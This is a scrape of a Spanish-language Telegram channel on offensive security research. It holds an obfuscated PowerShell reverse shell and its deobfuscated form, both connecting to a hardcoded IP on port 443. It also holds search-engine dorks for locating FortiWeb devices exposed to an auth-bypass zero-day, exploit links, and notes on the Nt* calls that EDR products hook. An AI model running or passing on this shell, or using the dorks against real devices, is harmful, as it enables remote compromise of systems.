Low Level CO 🇨🇴 – Telegram
Low Level CO 🇨🇴
121 subscribers
178 photos
10 videos
7 files
540 links
Canal enfocado en la investigación de técnicas de seguridad ofensivas avanzadas.

Windows internals
Malware Development
Exploits & Reversing
Low level programming
kernel mode & user mode
Syscall & Hypercalls
Ring 0, 3, -1
Firmware
Download Telegram
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
Fortinet 0day

An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.

Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/

Tweet: https://x.com/defusedcyber/status/1975242250373517373?s=46

Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
Shodan: http.noscript:FortiWeb

Affected versions: below 8.0.2
🔥1
Forwarded from Golden Byte
🎮POC for PS5 kernel vulnerability in fsc2h_ctrl syscall

#kernel_exploit #ps5 #binary_exploitation

@ZwLowLevel
https://github.com/MeisterLone/no_ctrl
Please open Telegram to view this post
VIEW IN TELEGRAM
👻 Script de Powershell ofuscado:

${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()


Ahora desofuscado:

$ip = "62.113.66.7"
$port = 443

$client = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $client.GetStream()

[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }

while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
$command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
$result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
$bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
$stream.Write($bytes, 0, $bytes.Length)
$stream.Flush()
}

$client.Close()


@ZwLowLevel
Please open Telegram to view this post
VIEW IN TELEGRAM
Se pueden observar las anomalías del stack frame cuando se hace uso de la librería de Detours para implementar user land hooks. En este contexto, se implementan hooks en MessageBoxW, poco realista en el mundo real para los proveedores de seguridad, pero en un contexto real, los EDR despliegan sensores para monitorear las llamadas a las funciones nativas (Nt*) en una variedad de contextos, como por ejemplo:

Funciones para la injeccion de procesos:

NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx


El mapeo de objetos de sesión en memoria:

NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection

@ZwLowLevel

En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.
🃏 Windows CodeDefender

This project demonstrates CodeDefenders ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.

#low_level #windows_kernel #windows_internals #uefi #bootloader

@ZwLowLevel
https://github.com/codedefender-io/windows
Please open Telegram to view this post
VIEW IN TELEGRAM